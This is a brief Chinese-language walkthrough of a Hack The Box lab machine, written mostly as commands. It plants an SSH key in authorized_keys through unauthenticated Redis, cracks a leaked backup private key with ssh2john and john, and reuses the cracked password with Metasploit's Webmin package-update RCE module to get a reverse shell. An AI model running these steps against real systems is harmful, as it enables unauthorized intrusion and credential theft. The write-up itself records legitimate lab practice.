HTB靶机wp
只为记录
redis未授权
ssh-keygen -t rsa -C "redis@fuck"
cd .ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt
redis-cli -h 10.10.10.160 flushall
cat ssh.txt | redis-cli -h 10.10.10.160 -x set ssh_key
redis-cli -h 10.10.10.160
CONFIG SET dir /var/lib/redis/.ssh/
CONFIG GET dir
CONFIG SET dbfilename "authorized_keys"
save
ssh -i fuck redis@10.10.10.160
连上去没有权限,使用这个提权 https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
找到一个敏感信息
[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak
Matt用户的id_rsa.bak
把他保存到本地为matt_key
要想使用john来破解,先要将其转为john支持的格式,这里使用ssh2john.py
./ssh2john.py /home/parrot/matt_key > /home/parrot/matt_hash
这里要解压/usr/share/wordlists/rockyou.txt.gz
使用gunzip
john --wordlist=/usr/share/wordlists/rockyou.txt matt_hash
切换Matt用户
再次查看user.txt
得到一个flag
webmin
直接访问10.10.10.160:10000报错,修改本地hosts文件
再次访问,得到webmin的登录面板 使用Matt,computer2008可以登录
use exploit/linux/http/webmin_packageup_rce
set rhosts 10.10.10.160
set ssl true
set username Matt
set password computer2008
set lhost 10.10.14.207
exploit
本文参考